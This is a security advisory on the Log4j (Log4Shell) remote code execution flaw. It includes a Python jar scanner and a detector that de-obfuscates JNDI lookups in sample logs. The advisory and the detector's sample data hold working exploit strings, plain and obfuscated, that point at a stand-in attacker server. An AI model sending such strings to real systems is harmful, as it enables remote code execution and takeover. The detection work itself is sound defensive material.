Critical Fault with Log4j Software

Attackers are actively exploiting a critical vulnerability in Apache Log4j, a logging library used in potentially millions of Java-based applications, including web-facing ones. Organisations should immediately review whether their applications, especially publicly accessible ones, use the library, and should implement mitigations as soon as possible.

This recently disclosed vulnerability in Log4j 2 is being actively exploited, putting widely used applications and cloud services at high risk.

Researchers discovered a critical vulnerability in the Apache Log4j library, which is part of the Apache Logging Project. Log4j is one of the easiest ways to add logging to a Java application, which is why it is so widely used. The Apache Software Foundation has now released fixes for the exploited zero-day in the Java-based logging library, a flaw that can be weaponised to execute malicious code and allow a complete takeover of vulnerable systems.

Log4j is used as the logging package in a wide range of popular software, including products and services from Amazon, Apple iCloud, Elasticsearch, Steam, Tesla and Twitter, and video games such as Minecraft.

The flaw allows unauthenticated remote code execution (RCE) against any application that logs attacker-controlled input with the open-source library, and affects Log4j versions 2.0-beta9 up to and including 2.14.1. The bug has been given the maximum CVSS score of 10.0, reflecting the severity of the issue. "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled," the Apache Software Foundation said in an advisory. "From Log4j 2.15.0, this behavior has been disabled by default."
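Reviewing whether an application ships an affected build means finding every copy of log4j-core, including copies bundled inside war and ear files, and checking two things: the version recorded in the jar's Maven pom.properties, and whether org/apache/logging/log4j/core/lookup/JndiLookup.class is still present (deleting that class from the jar was Apache's documented stopgap for builds that could not be upgraded at once). The Python scanner below is an added example written for this article, not Apache's code or any vendor's tool. It runs offline against a constructed sample tree of dummy jars that carry only those two marker entries; the 2.15.0 threshold is the one the advisory quoted above names, and later Apache releases raised the recommended floor further, so fixed_in should be set from the current advisory when the script is pointed at a real deployment.

```python
import io
import os
import re
import shutil
import tempfile
import zipfile

# Marker entries inside a log4j-core artifact: the Maven properties that carry the
# version, and the class whose removal is Apache's documented stopgap mitigation.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FIXED_IN = (2, 15, 0)   # first release the advisory names as fixed; raise to the current floor


def version_tuple(v):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release suffixes are ignored."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", v)
    return tuple(int(n) for n in m.groups(default="0")) if m else (0, 0, 0)


def inspect_archive(data, path, findings, depth=0):
    """Record version and JndiLookup presence for one archive; recurse into nested jars."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_CLASS in names
    if version or has_jndi:
        findings.append({"path": path, "version": version, "jndi_lookup_present": has_jndi})
    if depth < 4:                       # wars and ears bundle jars; follow a few levels
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                inspect_archive(zf.read(name), path + "!" + name, findings, depth + 1)


def scan_tree(root):
    """Walk a directory tree and inspect every jar/war/ear/zip found in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    inspect_archive(fh.read(), full, findings)
    return findings


def classify(finding, fixed_in=FIXED_IN):
    """One of vulnerable / patched / mitigated / review for a scan finding."""
    if not finding["jndi_lookup_present"]:
        return "mitigated"              # JndiLookup.class removed: the lookup cannot run
    if finding["version"] is None:
        return "review"                 # shaded or relocated copy with no version metadata
    v = version_tuple(finding["version"])
    return "vulnerable" if v[0] == 2 and v < fixed_in else "patched"


def make_jar(version=None, jndi=True, nested=None):
    """Constructed dummy archive (not real Log4j) carrying only the marker entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
        for name, blob in (nested or {}).items():
            zf.writestr(name, blob)
    return buf.getvalue()


def demo():
    """Build a constructed sample tree in a temp dir, scan it, return {relpath: verdict}."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    try:
        os.makedirs(os.path.join(root, "lib"))
        samples = {
            "lib/log4j-core-2.14.1.jar": make_jar("2.14.1"),
            "lib/log4j-core-2.15.0.jar": make_jar("2.15.0"),
            "lib/log4j-core-2.14.1-stripped.jar": make_jar("2.14.1", jndi=False),
            "lib/shaded-app.jar": make_jar(None, jndi=True),
            "app.war": make_jar(None, jndi=False, nested={
                "WEB-INF/lib/log4j-core-2.13.3.jar": make_jar("2.13.3")}),
        }
        for rel, blob in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(blob)
        return {os.path.relpath(f["path"], root): classify(f) for f in scan_tree(root)}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, verdict in sorted(demo().items()):
        print(f"{verdict:<11} {path}")
```

For a real review, call scan_tree on the deployment directory instead of demo()'s temporary tree. A "review" verdict (JndiLookup present, no version metadata) is what a shaded or relocated copy of the library looks like, and those are exactly the copies a version-based inventory misses. Apache's class-removal mitigation is the shell command zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class; Apache also documented the system property log4j2.formatMsgNoLookups=true for 2.10 through 2.14.1 but later withdrew it as a sufficient mitigation, so the "mitigated" verdict above covers only the class removal, and upgrading remains the fix.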

Exploitation requires only a single string of text. If a lookup such as ${jndi:ldap://attacker-host/a} is written to a log by a vulnerable Log4j instance, the library resolves it through JNDI and connects to the external host named in it; the attacker's server can then return a reference that makes the application retrieve a payload from a remote server and execute it locally. Because the string can arrive in any logged field, such as an HTTP User-Agent header, a username or a search term, no authentication is needed.
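Because Log4j resolves nested lookups inside-out, attackers split and disguise the string (${${lower:j}ndi:...}, ${${::-j}ndi:...}, ${${env:NaN:-j}ndi:...}), so a plain search for ${jndi: in logs or request fields misses much of the traffic. The Python below is an added example for this article, not code from Apache or any vendor. It models just enough of Log4j's substitution rules (the lower and upper lookups, case-insensitive prefixes, and the :- default syntax, a simplification of the real Interpolator) to undo that obfuscation over constructed sample access-log lines and report the JNDI target each line would have contacted, without ever performing the lookup.

```python
import re
from urllib.parse import urlsplit

# Innermost ${...}: a body with no further "${" or "}" inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")


def resolve_once(body, hits):
    """Resolve one innermost lookup the way Log4j 2's string substitution does,
    for the lookups that matter for obfuscation. Simplified model (assumption):
    real Log4j knows many more lookup prefixes than these."""
    key, has_default, default = body.partition(":-")   # "${env:X:-j}" -> default "j"
    prefix, _, arg = key.partition(":")
    prefix = prefix.lower()                             # lookup names are case-insensitive
    if prefix == "jndi":
        hits.append(arg)                                # record the target, never dereference it
        return "[jndi-lookup]"
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if has_default:                                     # unknown lookup with a default,
        return default                                  # e.g. "${::-j}" -> "j"
    return "${" + body + "}"                            # unresolvable: left as-is, like Log4j


def normalize(text, max_rounds=32):
    """Expand nested lookups inside-out until nothing changes.
    Returns the expanded text and the raw JNDI targets encountered."""
    hits = []
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            out = resolve_once(match.group(1), hits)
            changed = changed or out != match.group(0)
            return out

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text, hits


def find_jndi(line):
    """(scheme, host[:port], raw target) for every JNDI lookup hidden in a log line."""
    _, hits = normalize(line)
    return [(urlsplit(raw).scheme.lower(), urlsplit(raw).netloc, raw) for raw in hits]


def scan(lines):
    """Line index -> findings, for the lines that contain at least one JNDI lookup."""
    return {i: found for i, line in enumerate(lines) if (found := find_jndi(line))}


# Constructed sample access-log lines (not real traffic); 203.0.113.7 is a
# documentation address standing in for an attacker-controlled server.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${${lower:j}ndi:${lower:ldap}://203.0.113.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.7:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.7/d}"',
    '10.0.0.7 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${date:yyyy} ${upper:hello}"',
]

if __name__ == "__main__":
    for i, found in scan(SAMPLE_LOGS).items():
        for scheme, host, raw in found:
            print(f"line {i}: JNDI {scheme} -> {host}  ({raw})")
```

The last sample line is the reason to normalise rather than to flag every ${...}: it carries lookups but no JNDI target, and the same shape appears in benign template strings. The host and scheme that come out (ldap, rmi, dns and so on, pointed at the attacker's address) are what to pivot on in egress logs, since the vulnerable host has to connect there for the attack to go further.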

Given how widely Log4j is deployed across enterprise IT and DevOps tooling, it is vital that organisations address the flaw immediately.

The Israeli cyber security firm Cybereason has released a stopgap called Logout4Shell that uses the vulnerability itself to reconfigure the logger on a vulnerable host and prevent further exploitation; it buys time but is not a substitute for upgrading. "This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string," security researcher Marcus Hutchins said in a tweet.
